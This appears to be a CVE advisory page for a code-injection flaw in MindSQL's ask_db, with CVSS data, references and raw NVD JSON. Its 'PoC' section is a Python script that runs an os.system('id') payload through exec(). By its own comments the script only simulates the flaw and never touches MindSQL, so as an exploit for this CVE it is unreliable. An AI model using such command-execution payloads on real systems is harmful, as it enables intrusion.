CVE-2026-4506

Description

A vulnerability was found in Mindinventory MindSQL up to 0.2.1. Impacted is the function ask_db of the file mindsql/core/mindsql_core.py. Performing a manipulation results in code injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Mindinventory MindSQL <= 0.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-4506: MindSQL Code Injection
# Demonstrates remote code execution via ask_db

import sys

# Simulating the vulnerable function behavior based on description
# In a real scenario, this would be done via the library API

def exploit_mindsql(user_input):
    # Vulnerable code pattern typically found in such libraries
    print(f"[*] Sending payload to ask_db: {user_input}")
    try:
        # This mimics the vulnerable execution flow
        # Example: exec(user_input) or eval(user_input)
        # DO NOT RUN THIS IN PRODUCTION
        exec(user_input)
    except Exception as e:
        print(f"Error: {e}")

# Malicious payload to execute system commands
payload = "__import__('os').system('id')"

print("[!] Exploiting CVE-2026-4506...")
exploit_mindsql(payload)
print("[+] Exploit finished.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4506
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4506
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4506/
[4] VulDB https://vuldb.com/cve/CVE-2026-4506
[5] https://github.com/Ka7arotto/cve/blob/main/MindSQL-RCE.md
[6] https://vuldb.com/?ctiid.352072
[7] https://vuldb.com/?id.352072
[8] https://vuldb.com/?submit.773898

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4506", "sourceIdentifier": "[email protected]", "published": "2026-03-20T22:16:29.960", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Mindinventory MindSQL up to 0.2.1. Impacted is the function ask_db of the file mindsql/core/mindsql_core.py. Performing a manipulation results in code injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue encontrada en Mindinventory MindSQL hasta 0.2.1. Impactada es la función ask_db del archivo mindsql/core/mindsql_core.py. Realizar una manipulación resulta en inyección de código. El ataque puede ser iniciado remotamente. El exploit ha sido hecho público y podría ser usado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/Ka7arotto/cve/blob/main/MindSQL-RCE.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352072", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352072", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773898", "source": "[email protected]"}]}}